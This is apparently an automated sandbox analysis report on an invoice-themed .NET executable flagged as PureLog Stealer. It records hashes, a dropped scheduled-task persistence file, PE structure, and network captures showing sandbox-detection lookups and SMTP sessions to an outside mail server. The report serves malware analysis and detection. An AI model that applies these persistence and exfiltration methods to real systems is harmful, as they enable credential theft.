                                                                                C:\Users\user\AppData\Local\Temp\tmp3165.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:XML 1.0 document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):1573
                                                                                Entropy (8bit):5.111302380792291
                                                                                Encrypted:false
                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtag8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTB8v
                                                                                MD5:EC61904CC9DF3668924458C492EBC250
                                                                                SHA1:52F11617BF9BFD3F4FEC7D79F52DD18E2F3821FD
                                                                                SHA-256:CBBEDB375EFA910716421361E3AF4AA3371299A70B5F6028B2D3C774C3D715C7
                                                                                SHA-512:1EBCBDC9B90EF90A63FC56BAD69290084C9CA493CC98DB18B025A7EE20F1FD25738D58859C9D8B0DE64E317EA3E32EC901152A0088F017B83EB6DDCEBCB0C7E6
                                                                                Malicious:true
                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                C:\Users\user\AppData\Local\Temp\tmp3E66.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                File Type:XML 1.0 document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):1573
                                                                                Entropy (8bit):5.111302380792291
                                                                                Encrypted:false
                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtag8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTB8v
                                                                                MD5:EC61904CC9DF3668924458C492EBC250
                                                                                SHA1:52F11617BF9BFD3F4FEC7D79F52DD18E2F3821FD
                                                                                SHA-256:CBBEDB375EFA910716421361E3AF4AA3371299A70B5F6028B2D3C774C3D715C7
                                                                                SHA-512:1EBCBDC9B90EF90A63FC56BAD69290084C9CA493CC98DB18B025A7EE20F1FD25738D58859C9D8B0DE64E317EA3E32EC901152A0088F017B83EB6DDCEBCB0C7E6
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                C:\Users\user\AppData\Roaming\pUAQmWA.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):717312
                                                                                Entropy (8bit):7.877827859340402
                                                                                Encrypted:false
                                                                                SSDEEP:12288:pCazT37rXbgicYSDZQcwGTjM5ucgZgvZ3f3bIq/bVt3zA8mH:pFXbgicYO3DToeq3f3bN3cN
                                                                                MD5:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                SHA1:78424F07E9A07B41322A2A91FA71A7DB42A8DFD6
                                                                                SHA-256:76023EE62DB39B5F6E730247C677494D69EAD6467E2D2D313BA0F7A87F9CE977
                                                                                SHA-512:270C9CFE26EC1128A97A6EE0B52C27827D599A9A7720E97878AEB7886B85C78E20201AA513037BEA6D81897A1A2982DEE44C9AD5816666D7BBDFED18EEC2B714
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                                • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f..............0......&........... ........@.. .......................`............@.....................................K.......x#...................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...x#.......$..................@..@.reloc.......@......................@..B........................H...........Ts...........Q...............................................0..g.......s.......}......|...........|.................s............s............s.........(......{......8......*..0..D.......(....8....(....8.....(.... .....:....&8....8........E........8.....*&~.......*...~....*..0..V.......(....8....(....8......}....8.....(.... .....:....& ....8....8........E........8......*...(....(......}.....(........}....*...0..{..........o .....{.......o!...s".......o#...o$....8

                                                                                C:\Users\user\AppData\Roaming\pUAQmWA.exe:Zone.Identifier

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:false
                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.877827859340402
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:TT Invoice copy.exe
                                                                                File size:717'312 bytes
                                                                                MD5:bf78f7d9bb46ae5314ec7b6d9e651b23
                                                                                SHA1:78424f07e9a07b41322a2a91fa71a7db42a8dfd6
                                                                                SHA256:76023ee62db39b5f6e730247c677494d69ead6467e2d2d313ba0f7a87f9ce977
                                                                                SHA512:270c9cfe26ec1128a97a6ee0b52c27827d599a9a7720e97878aeb7886b85c78e20201aa513037bea6d81897a1a2982dee44c9ad5816666d7bbdfed18eec2b714
                                                                                SSDEEP:12288:pCazT37rXbgicYSDZQcwGTjM5ucgZgvZ3f3bIq/bVt3zA8mH:pFXbgicYO3DToeq3f3bN3cN
                                                                                TLSH:F7E41286B7ABCD96D09C5236C1D300040370974BB573D74B7BC9225DAE827EA8989F9F
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f..............0......&........... ........@.. .......................`............@................................

                                                                                File Icon

                                                                                Icon Hash:63f98d9d99a5899b

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4ae82e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x661D7396 [Mon Apr 15 18:36:06 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xae7e00x4b.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x2378.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xac8340xaca00489c9f17a01e96063c0a6b4fe478a073False0.9298840853548154data7.886672511134331IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xb00000x23780x240003703d94eaa364a4408c8a441729ba1fFalse0.8552517361111112data7.348564959434729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xb40000xc0x200acdf7793c9e66e4c09eb52e2361a8295False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xb01300x1e09PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9348419820522825
                                                                                RT_GROUP_ICON0xb1f3c0x14data1.05
                                                                                RT_VERSION0xb1f500x23cdata0.46678321678321677
                                                                                RT_MANIFEST0xb218c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 16, 2024 14:10:58.896682978 CEST4973380192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:10:59.012398958 CEST8049733208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:10:59.014748096 CEST4973380192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:10:59.015516996 CEST4973380192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:10:59.132834911 CEST8049733208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:10:59.191843987 CEST4973380192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:10:59.885087967 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:00.039355993 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.042174101 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:00.382766008 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.383255005 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:00.536895037 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.537072897 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.537468910 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:00.691555977 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.697787046 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:00.851967096 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.852010965 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.852049112 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.852082968 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:00.852087975 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:00.852145910 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:01.005525112 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:01.030524015 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:01.184557915 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:01.353240967 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:01.507015944 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:01.507934093 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:01.664088964 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:01.664891958 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:01.824409962 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:01.824728012 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:01.940977097 CEST4973780192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:01.979136944 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:01.979429960 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.058199883 CEST8049737208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:11:02.058584929 CEST4973780192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:02.058990002 CEST4973780192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:02.156524897 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.156797886 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.181477070 CEST8049737208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:11:02.310606956 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.311177015 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.311252117 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.311276913 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.311295986 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.410566092 CEST4973780192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:02.465641022 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.465677977 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.593059063 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.594620943 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.723052979 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.748076916 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.748246908 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:02.905608892 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:02.914140940 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.067991018 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.068171978 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.068346977 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.222124100 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.225217104 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.379091024 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.379111052 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.379128933 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.379151106 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.379170895 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.379206896 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.533066034 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.544977903 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.699280977 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.711564064 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:03.866111040 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:03.866485119 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.022603035 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.022937059 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.183928013 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.184186935 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.339020014 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.339243889 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.519103050 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.519412041 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.674664021 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.675369978 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.675466061 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.675466061 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.675512075 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:04.829039097 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.829077005 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:04.955878973 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:11:05.004812002 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:11:43.267838001 CEST8049733208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:11:43.267972946 CEST4973380192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:49.785836935 CEST4973380192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:49.902148962 CEST8049733208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:11:52.600310087 CEST4973780192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:11:52.716240883 CEST8049737208.95.112.1192.168.2.4
                                                                                Apr 16, 2024 14:11:52.716418028 CEST4973780192.168.2.4208.95.112.1
                                                                                Apr 16, 2024 14:12:39.978658915 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:12:40.132812023 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:12:40.133304119 CEST58749734208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:12:40.133549929 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:12:40.370917082 CEST49734587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:12:42.614129066 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:12:42.768755913 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:12:42.769282103 CEST58749738208.91.198.143192.168.2.4
                                                                                Apr 16, 2024 14:12:42.769351959 CEST49738587192.168.2.4208.91.198.143
                                                                                Apr 16, 2024 14:12:42.774147987 CEST49738587192.168.2.4208.91.198.143

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 16, 2024 14:10:58.780589104 CEST5597453192.168.2.41.1.1.1
                                                                                Apr 16, 2024 14:10:58.888901949 CEST53559741.1.1.1192.168.2.4
                                                                                Apr 16, 2024 14:10:59.776738882 CEST6100153192.168.2.41.1.1.1
                                                                                Apr 16, 2024 14:10:59.883135080 CEST53610011.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Apr 16, 2024 14:10:58.780589104 CEST192.168.2.41.1.1.10x4290Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                Apr 16, 2024 14:10:59.776738882 CEST192.168.2.41.1.1.10xb7edStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Apr 16, 2024 14:10:58.888901949 CEST1.1.1.1192.168.2.40x4290No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                Apr 16, 2024 14:10:59.883135080 CEST1.1.1.1192.168.2.40xb7edNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                Apr 16, 2024 14:10:59.883135080 CEST1.1.1.1192.168.2.40xb7edNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                Apr 16, 2024 14:10:59.883135080 CEST1.1.1.1192.168.2.40xb7edNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                Apr 16, 2024 14:10:59.883135080 CEST1.1.1.1192.168.2.40xb7edNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • ip-api.com

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449733208.95.112.1807508C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Apr 16, 2024 14:10:59.015516996 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                Host: ip-api.com
                                                                                Connection: Keep-Alive
                                                                                Apr 16, 2024 14:10:59.132834911 CEST174INHTTP/1.1 200 OK
                                                                                Date: Tue, 16 Apr 2024 12:10:59 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 5
                                                                                Access-Control-Allow-Origin: *
                                                                                X-Ttl: 60
                                                                                X-Rl: 44
                                                                                Data Raw: 74 72 75 65 0a
                                                                                Data Ascii: true


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449737208.95.112.1807896C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Apr 16, 2024 14:11:02.058990002 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                Host: ip-api.com
                                                                                Connection: Keep-Alive
                                                                                Apr 16, 2024 14:11:02.181477070 CEST174INHTTP/1.1 200 OK
                                                                                Date: Tue, 16 Apr 2024 12:11:01 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 5
                                                                                Access-Control-Allow-Origin: *
                                                                                X-Ttl: 60
                                                                                X-Rl: 44
                                                                                Data Raw: 74 72 75 65 0a
                                                                                Data Ascii: true


                                                                                SMTP Packets

                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                Apr 16, 2024 14:11:00.382766008 CEST58749734208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                Apr 16, 2024 14:11:00.383255005 CEST49734587192.168.2.4208.91.198.143EHLO 468325
                                                                                Apr 16, 2024 14:11:00.537072897 CEST58749734208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                250-PIPELINING
                                                                                250-SIZE 41648128
                                                                                250-VRFY
                                                                                250-ETRN
                                                                                250-STARTTLS
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-AUTH=PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-DSN
                                                                                250 CHUNKING
                                                                                Apr 16, 2024 14:11:00.537468910 CEST49734587192.168.2.4208.91.198.143STARTTLS
                                                                                Apr 16, 2024 14:11:00.691555977 CEST58749734208.91.198.143192.168.2.4220 2.0.0 Ready to start TLS
